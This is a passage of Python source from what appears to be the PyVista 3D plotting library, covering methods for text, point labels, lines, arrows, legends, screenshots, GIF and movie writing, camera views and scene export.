self.iren.TerminateApp()
del self.iren
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
def deep_clean(self):
"""Clean the plotter of the memory."""
for renderer in self.renderers:
renderer.deep_clean()
# Do not remove the renderers on the clean
self.mesh = None
self.mapper = None
def add_text(self, text, position='upper_left', font_size=18, color=None,
font=None, shadow=False, name=None, loc=None, viewport=False):
"""Add text to plot object in the top left corner by default.
Parameters
----------
text : str
The text to add the rendering
position : str, tuple(float)
Position to place the bottom left corner of the text box.
If tuple is used, the position of the text uses the pixel
coordinate system (default). In this case,
it returns a more general `vtkOpenGLTextActor`.
If string name is used, it returns a `vtkCornerAnnotation`
object normally used for fixed labels (like title or xlabel).
Default is to find the top left corner of the rendering window
and place text box up there. Available position: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``
font : string, optional
Font name may be courier, times, or arial
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
viewport : bool, optional
If True and position is a tuple of float, uses
the normalized viewport coordinate system (values between 0.0
and 1.0 and support for HiDPI).
Return
------
textActor : vtk.vtkTextActor
Text actor added to plot
"""
if font is None:
font = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if color is None:
color = rcParams['font']['color']
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left': vtk.vtkCornerAnnotation.LowerLeft,
'lower_right': vtk.vtkCornerAnnotation.LowerRight,
'upper_left': vtk.vtkCornerAnnotation.UpperLeft,
'upper_right': vtk.vtkCornerAnnotation.UpperRight,
'lower_edge': vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge': vtk.vtkCornerAnnotation.UpperEdge,
'left_edge': vtk.vtkCornerAnnotation.LeftEdge,
'right_edge': vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position is True:
position = corner_mappings['upper_left']
self.textActor = vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
if viewport:
self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONT_KEYS[font])
self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, loc=loc, pickable=False)
return self.textActor
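# Illustrative sketch (added comments, not part of the original source):
# the two text modes implemented above, a corner annotation selected by a
# string position and a pixel-positioned ``vtkTextActor``; ``pl`` is a
# Plotter as in the sketches above.
# >>> _ = pl.add_text('corner label', position='upper_right', font_size=12)
# >>> _ = pl.add_text('pixel label', position=(40, 40), color='w')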
def open_movie(self, filename, framerate=24):
"""Establish a connection to the ffmpeg writer.
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See ``imageio.get_writer``.
framerate : int, optional
Frames per second.
"""
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = imageio.get_writer(filename, fps=framerate)
def open_gif(self, filename):
"""Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in gif.
"""
if not filename.lower().endswith('.gif'):
raise Exception('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = imageio.get_writer(filename, mode='I')
def write_frame(self):
"""Write a single frame to the movie file."""
if not hasattr(self, 'mwriter'):
raise AssertionError('This plotter has not opened a movie or GIF file.')
self.mwriter.append_data(self.image)
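# Illustrative sketch (added comments, not part of the original source):
# writing a short animation by combining ``open_gif``, ``update_coordinates``
# and ``write_frame``; 'wave.gif' is a hypothetical output name and imageio
# must be installed. ``pl`` and ``mesh`` continue the sketches above.
# >>> import numpy as np
# >>> pts = mesh.points.copy()
# >>> pl.open_gif('wave.gif')
# >>> for phase in np.linspace(0, 2 * np.pi, 20):
# ...     pl.update_coordinates(pts + np.sin(phase))
# ...     pl.write_frame()
# >>> pl.close()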
@property
def window_size(self):
"""Return the render window size."""
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
"""Set the render window size."""
self.ren_win.SetSize(window_size[0], window_size[1])
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_array(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
def get_image_depth(self,
fill_value=np.nan,
reset_camera_clipping_range=True):
"""Return a depth image representing current render window.
Parameters
----------
fill_value : float
Fill value for points in image that don't include objects in scene.
To not use a fill value, pass ``None``.
reset_camera_clipping_range : bool
Reset the camera clipping range to include data in view?
Return
------
image_depth : numpy.ndarray
Image of depth values from camera orthogonal to image plane
Notes
-----
Values in image_depth are negative to adhere to a
right-handed coordinate system.
"""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image_depth'):
zval = self.last_image_depth.copy()
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
# Ensure points in view are within clipping range of renderer?
if reset_camera_clipping_range:
self.renderer.ResetCameraClippingRange()
# Get the z-buffer image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
zbuff = self._run_image_filter(ifilter)[:, :, 0]
# Convert z-buffer values to depth from camera
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
near, far = self.camera.GetClippingRange()
if self.camera.GetParallelProjection():
zval = (zbuff - near) / (far - near)
else:
zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far)
# Consider image values outside clipping range as nans
args = np.logical_or(zval < -far, np.isclose(zval, -far))
self._image_depth_null = args
if fill_value is not None:
zval[args] = fill_value
return zval
@property
def image_depth(self):
"""Return a depth image representing current render window.
Helper attribute for ``get_image_depth``.
"""
return self.get_image_depth()
@property
def image(self):
"""Return an image array of current render window."""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'):
return self.last_image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
if self.image_transparent_background:
ifilter.SetInputBufferTypeToRGBA()
else:
ifilter.SetInputBufferTypeToRGB()
return self._run_image_filter(ifilter)
def enable_eye_dome_lighting(self):
"""Enable eye dome lighting (EDL) for the active renderer."""
return self.renderer.enable_eye_dome_lighting()
def disable_eye_dome_lighting(self):
"""Disable eye dome lighting (EDL) for the active renderer."""
return self.renderer.disable_eye_dome_lighting()
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""Add lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line segments
would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
width : float, optional
Thickness of lines
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
actor : vtk.vtkActor
Lines actor.
"""
if not isinstance(lines, np.ndarray):
raise Exception('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
self._labels.append([lines, label, rgb_color])
# Create actor
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetLineWidth(width)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(rgb_color)
actor.GetProperty().SetColor(rgb_color)
actor.GetProperty().LightingOff()
# Add to renderer (use a local actor so the scalar bar reference is not clobbered)
self.add_actor(actor, reset_camera=False, name=name, pickable=False)
return actor
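# Illustrative sketch (added comments, not part of the original source):
# ``add_lines`` expects flat pairs of segment end points, as documented above;
# ``pl`` is a Plotter as in the sketches above.
# >>> import numpy as np
# >>> segments = np.array([[0, 0, 0], [1, 0, 0],
# ...                      [1, 0, 0], [1, 1, 0]])
# >>> _ = pl.add_lines(segments, color='y', width=3)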
def remove_scalar_bar(self):
"""Remove the scalar bar."""
if hasattr(self, 'scalar_bar'):
self.remove_actor(self.scalar_bar, reset_camera=False)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color=None,
font_family=None, shadow=False,
show_points=True, point_color=None, point_size=5,
name=None, shape_color='grey', shape='rounded_rect',
fill_shape=True, margin=3, shape_opacity=1.0,
pickable=False, render_points_as_spheres=False,
tolerance=0.001):
"""Create a point actor with one label from list labels assigned to each point.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : list or str
List of labels. Must be the same length as points. If a string name
is given with a pyvista.Common input for points, then these are fetched.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
font_size : float, optional
Sets the size of the title font. Defaults to 16.
text_color : string or 3 item list, optional
Color of text. Either a string, rgb list, or hex color string.
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
show_points : bool, optional
Controls if points are visible. Default True
point_color : string or 3 item list, optional
Color of points (if visible). Either a string, rgb list, or hex color string. For example:
point_color='white'
point_color='w'
point_color=[1, 1, 1]
point_color='#FFFFFF'
point_size : float, optional
Size of points (if visible)
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
shape_color : string or 3 item list, optional
Color of the label background shape. Either a string, rgb list, or hex color string. Defaults to ``'grey'``.
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : float
The opacity of the shape between zero and one.
tolerance : float
a tolerance to use to determine whether a point label is visible.
A tolerance is usually required because the conversion from world
space to display space during rendering introduces numerical
round-off.
Return
------
labelMapper : vtk.vtkLabelPlacementMapper
VTK label mapper. Can be used to change properties of the labels.
"""
if font_family is None:
font_family = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if point_color is None:
point_color = rcParams['color']
if text_color is None:
text_color = rcParams['font']['color']
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_arrays[labels].astype(str)
else:
raise TypeError('Points type not usable: {}'.format(type(points)))
if len(vtkpoints.points) != len(labels):
raise Exception('There must be one label for each point')
if name is None:
name = '{}({})'.format(type(vtkpoints).__name__, str(hex(id(vtkpoints))))
vtklabels = vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Only show visible points
vis_points = vtk.vtkSelectVisiblePoints()
vis_points.SetInputData(vtkpoints)
vis_points.SetRenderer(self.renderer)
vis_points.SetTolerance(tolerance)
# Create hierarchy
hier = vtk.vtkPointSetToLabelHierarchy()
hier.SetInputConnection(vis_points.GetOutputPort())
hier.SetLabelArrayName('labels')
# create label mapper
labelMapper = vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() == 'rect':
labelMapper.SetShapeToRect()
elif shape.lower() == 'rounded_rect':
labelMapper.SetShapeToRoundedRect()
else:
raise RuntimeError('Shape ({}) not understood'.format(shape))
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(parse_color(shape_color))
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
self.remove_actor('{}-points'.format(name), reset_camera=False)
self.remove_actor('{}-labels'.format(name), reset_camera=False)
# add points
if show_points:
style = 'points'
else:
style = 'surface'
self.add_mesh(vtkpoints, style=style, color=point_color,
point_size=point_size, name='{}-points'.format(name),
pickable=pickable,
render_points_as_spheres=render_points_as_spheres)
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
self.add_actor(labelActor, reset_camera=False,
name='{}-labels'.format(name), pickable=False)
return labelMapper
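# Illustrative sketch (added comments, not part of the original source):
# labelling a few explicit points; ``add_point_labels`` also accepts a dataset
# plus the name of one of its point arrays. ``pl`` continues the sketches above.
# >>> import numpy as np
# >>> pts = np.array([[0.0, 0.0, 0.0], [1.0, 1.0, 0.0], [2.0, 0.0, 0.0]])
# >>> labels = ['origin', 'corner', 'far point']
# >>> _ = pl.add_point_labels(pts, labels, font_size=20, point_color='red')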
def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Label the points from a dataset with the values of their scalars.
Wrapper for :func:`pyvista.BasePlotter.add_point_labels`.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : str
String name of the point data array to use.
fmt : str
String formatter used to format numerical data
"""
if not is_pyvista_dataset(points):
raise TypeError('input points must be a pyvista dataset, not: {}'.format(type(points)))
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalars array to use')
if fmt is None:
fmt = rcParams['font']['fmt']
if fmt is None:
fmt = '%.6e'
scalars = points.point_arrays[labels]
phrase = '{} {}'.format(preamble, fmt)
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
"""Add points to a mesh."""
kwargs['style'] = 'points'
self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
"""Add arrows to plotting object."""
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
direction[:,0] *= mag
direction[:,1] *= mag
direction[:,2] *= mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = vtk.vtkArrowSource()
arrow.Update()
glyph3D = vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
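# Illustrative sketch (added comments, not part of the original source):
# drawing glyph arrows from centres along direction vectors (both n x 3);
# ``pl`` is a Plotter as in the sketches above.
# >>> import numpy as np
# >>> cent = np.random.random((10, 3))
# >>> direction = np.random.random((10, 3)) - 0.5
# >>> _ = pl.add_arrows(cent, direction, mag=2)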
@staticmethod
def _save_image(image, filename, return_img=None):
"""Save a NumPy image array.
This is an internal helper.
"""
if not image.size:
raise Exception('Empty image. Have you run plot() first?')
# write screenshot to file
supported_formats = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"]
if isinstance(filename, str):
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
if not any([filename.lower().endswith(ext) for ext in supported_formats]):
filename += ".png"
filename = os.path.abspath(os.path.expanduser(filename))
w = imageio.imwrite(filename, image)
if not return_img:
return w
return image
def save_graphic(self, filename, title='PyVista Export', raster=True, painter=True):
"""Save a screenshot of the rendering window as a graphic file.
The supported formats are: '.svg', '.eps', '.ps', '.pdf', '.tex'
"""
if not hasattr(self, 'ren_win'):
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
filename = os.path.abspath(os.path.expanduser(filename))
extension = pyvista.fileio.get_ext(filename)
valid = ['.svg', '.eps', '.ps', '.pdf', '.tex']
if extension not in valid:
raise RuntimeError('Extension ({}) is an invalid choice. Valid options include: {}'.format(extension, ', '.join(valid)))
writer = vtk.vtkGL2PSExporter()
modes = {
'.svg': writer.SetFileFormatToSVG,
'.eps': writer.SetFileFormatToEPS,
'.ps': writer.SetFileFormatToPS,
'.pdf': writer.SetFileFormatToPDF,
'.tex': writer.SetFileFormatToTeX,
}
writer.CompressOff()
writer.SetFilePrefix(filename.replace(extension, ''))
writer.SetInput(self.ren_win)
modes[extension]()
writer.SetTitle(title)
writer.SetWrite3DPropsAsRasterImage(raster)
if painter:
writer.UsePainterSettings()
writer.Update()
return
def screenshot(self, filename=None, transparent_background=None,
return_img=None, window_size=None):
"""Take screenshot at current camera position.
Parameters
----------
filename : str, optional
Location to write image to. If None, no image is written.
transparent_background : bool, optional
Makes the background transparent. Default False.
return_img : bool, optional
If a string filename is given and this is true, a NumPy array of
the image will be returned.
Return
------
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = rcParams['transparent_background']
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if hasattr(self, 'last_image'):
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(self, Plotter):
# TODO: we need a consistent rendering function
self.render()
else:
self._render()
# debug: this needs to be called twice for some reason,
img = self.image
img = self.image
return self._save_image(img, filename, return_img)
def add_legend(self, labels=None, bcolor=(0.5, 0.5, 0.5), border=False,
size=None, name=None):
"""Add a legend to render window.
Entries must be a list containing one string and color entry for each
item.
Parameters
----------
labels : list, optional
When set to None, uses existing labels as specified by
- add_mesh
- add_lines
- add_points
List containing one entry for each item to be added to the
legend. Each entry must contain two strings, [label,
color], where label is the name of the item to add, and
color is the color of the label to add.
bcolor : list or string, optional
Background color, either a three item 0 to 1 RGB color
list, or a matplotlib color string (e.g. 'w' or 'white'
for a white color). If None, legend background is
disabled.
border : bool, optional
Controls if there will be a border around the legend.
Default False.
size : list, optional
Two float list, each float between 0 and 1. For example
[0.1, 0.1] would make the legend 10% the size of the
entire figure window.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
legend : vtk.vtkLegendBoxActor
Actor for the legend.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, label='My Mesh')
>>> _ = plotter.add_mesh(othermesh, 'k', label='My Other Mesh')
>>> _ = plotter.add_legend()
>>> plotter.show() # doctest:+SKIP
Alternative manual example
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> legend_entries = []
>>> legend_entries.append(['My Mesh', 'w'])
>>> legend_entries.append(['My Other Mesh', 'k'])
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.add_mesh(othermesh, 'k')
>>> _ = plotter.add_legend(legend_entries)
>>> plotter.show() # doctest:+SKIP
"""
self.legend = vtk.vtkLegendBoxActor()
if labels is None:
# use existing labels
if not self._labels:
raise Exception('No labels input.\n\n'
'Add labels to individual items when adding them to '
'the plotting object with the "label=" parameter, '
'or enter them as the "labels" parameter.')
self.legend.SetNumberOfEntries(len(self._labels))
for i, (vtk_object, text, color) in enumerate(self._labels):
self.legend.SetEntry(i, vtk_object, text, parse_color(color))
else:
self.legend.SetNumberOfEntries(len(labels))
legendface = pyvista.single_triangle()
for i, (text, color) in enumerate(labels):
self.legend.SetEntry(i, legendface, text, parse_color(color))
if size:
self.legend.SetPosition2(size[0], size[1])
if bcolor is None:
self.legend.UseBackgroundOff()
else:
self.legend.UseBackgroundOn()
self.legend.SetBackgroundColor(bcolor)
if border:
self.legend.BorderOn()
else:
self.legend.BorderOff()
# Add to renderer
self.add_actor(self.legend, reset_camera=False, name=name, pickable=False)
return self.legend
@property
def camera_position(self):
"""Return camera position of the active render window."""
return self.renderers[self._active_renderer_index].camera_position
@camera_position.setter
def camera_position(self, camera_location):
"""Set camera position of the active render window."""
self.renderers[self._active_renderer_index].camera_position = camera_location
def reset_camera(self):
"""Reset the camera of the active render window.
The camera slides along the vector defined from camera position to focal point
until all of the actors can be seen.
"""
self.renderers[self._active_renderer_index].reset_camera()
self._render()
def isometric_view(self):
"""Reset the camera to a default isometric view.
DEPRECATED: Please use ``view_isometric``.
"""
return self.view_isometric()
def view_isometric(self, negative=False):
"""Reset the camera to a default isometric view.
The view will show all the actors in the scene.
"""
return self.renderer.view_isometric(negative=negative)
def view_vector(self, vector, viewup=None):
"""Set the view vector."""
return self.renderer.view_vector(vector, viewup=viewup)
def view_xy(self, negative=False):
"""View the XY plane."""
return self.renderer.view_xy(negative=negative)
def view_yx(self, negative=False):
"""View the YX plane."""
return self.renderer.view_yx(negative=negative)
def view_xz(self, negative=False):
"""View the XZ plane."""
return self.renderer.view_xz(negative=negative)
def view_zx(self, negative=False):
"""View the ZX plane."""
return self.renderer.view_zx(negative=negative)
def view_yz(self, negative=False):
"""View the YZ plane."""
return self.renderer.view_yz(negative=negative)
def view_zy(self, negative=False):
"""View the ZY plane."""
return self.renderer.view_zy(negative=negative)
def disable(self):
"""Disable this renderer's camera from being interactive."""
return self.renderer.disable()
def enable(self):
"""Enable this renderer's camera to be interactive."""
return self.renderer.enable()
def set_background(self, color, loc='all', top=None):
"""Set the background color.
Parameters
----------
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
loc : int, tuple, list, or str, optional
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If ``loc='all'`` then all
render windows will have their background set.
top : string or 3 item list, optional, defaults to None
If given, this will enable a gradient background where the
``color`` argument is at the bottom and the color given in ``top``
will be the color at the top of the renderer.
"""
if color is None:
color = rcParams['background']
use_gradient = False
if top is not None:
use_gradient = True
if loc == 'all':
for renderer in self.renderers:
renderer.SetBackground(parse_color(color))
if use_gradient:
renderer.GradientBackgroundOn()
renderer.SetBackground2(parse_color(top))
else:
renderer.GradientBackgroundOff()
else:
renderer = self.renderers[self.loc_to_index(loc)]
renderer.SetBackground(parse_color(color))
if use_gradient:
renderer.GradientBackgroundOn()
renderer.SetBackground2(parse_color(top))
else:
renderer.GradientBackgroundOff()
@property
def background_color(self):
"""Return the background color of the first render window."""
return self.renderers[0].GetBackground()
@background_color.setter
def background_color(self, color):
"""Set the background color of all the render windows."""
self.set_background(color)
def remove_legend(self):
"""Remove the legend actor."""
if hasattr(self, 'legend'):
self.remove_actor(self.legend, reset_camera=False)
self._render()
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, shift=0.0):
"""Generate an orbital path around the data scene.
Parameters
----------
factor : float
A scaling factor used when building the orbital extent
n_points : int
number of points on the orbital path
viewup : list(float)
the normal to the orbital plane
shift : float, optional
shift the plane up/down from the center of the scene by this amount
"""
if viewup is None:
viewup = rcParams['camera']['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Move the current camera's focal point to a position point.
The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
"""
if not hasattr(self, 'iren'):
raise AttributeError('This plotter does not have an interactive window')
return self.iren.FlyTo(self.renderer, *point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None,
bkg=True, write_frames=False):
"""Orbit on the given path focusing on the focus point.
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order of the points is the order of
travel.
focus : list(float) of length 3, optional
The point on which to focus the camera.
step : float, optional
The timestep between flying to each camera position
viewup : list(float)
the normal to the orbital plane
write_frames : bool
Assume a file is open and write a frame on each camera view during
the orbit.
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = rcParams['camera']['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.SetThickness(path.length)
def orbit():
"""Define the internal thread for running the orbit."""
for point in points:
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
self.renderer.ResetCameraClippingRange()
self._render()
if bkg:
time.sleep(step)
if write_frames:
self.write_frame()
if bkg and isinstance(self, pyvista.BackgroundPlotter):
thread = Thread(target=orbit)
thread.start()
else:
bkg = False
orbit()
return
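# Illustrative sketch (added comments, not part of the original source):
# orbiting the camera around the scene and writing every view to an open movie
# file; 'orbit.mp4' is a hypothetical output name. ``pl`` and ``mesh`` continue
# the sketches above.
# >>> path = pl.generate_orbital_path(n_points=36, shift=mesh.length)
# >>> pl.open_movie('orbit.mp4')
# >>> pl.orbit_on_path(path, write_frames=True)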
def export_vtkjs(self, filename, compress_arrays=False):
"""Export the current rendering scene as a VTKjs scene.
It can be used for rendering in a web browser.
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
return export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def export_obj(self, filename):
"""Export scene to OBJ format."""
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter must still have a render window open.")
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
exporter = vtk.vtkOBJExporter()
exporter.SetFilePrefix(filename)
exporter.SetRenderWindow(self.ren_win)
return exporter.Write()
def __del__(self):
"""Delete the plotter."""
self.close()
self.deep_clean()
del self.renderers
class Plotter(BasePlotter):
"""Plotting object to display vtk meshes or numpy arrays.
Example
-------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, color='red')
>>> _ = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show() # doctest:+SKIP
Parameters
----------
off_screen : bool, optional
Renders off screen when True. Useful for automated screenshots.
notebook : bool, optional
When True, the resulting plot is placed inline in a Jupyter notebook.
Assumes a jupyter console is active. Automatically enables off_screen.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render window.
Can also accept a shape as string descriptor. E.g.:
shape="3|1" means 3 plots on the left and 1 on the right,
shape="4/2" means 4 plots on top of 2 at bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
multi_samples : int
The number of multi-samples used to mitigate aliasing. 4 is a good
default but 8 will have better results with a potential impact on
performance.
line_smoothing : bool
If True, enable line smoothing
point_smoothing : bool
If True, enable point smoothing
polygon_smoothing : bool
If True, enable polygon smoothing
"""
last_update_time = 0.0
q_pressed = False
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
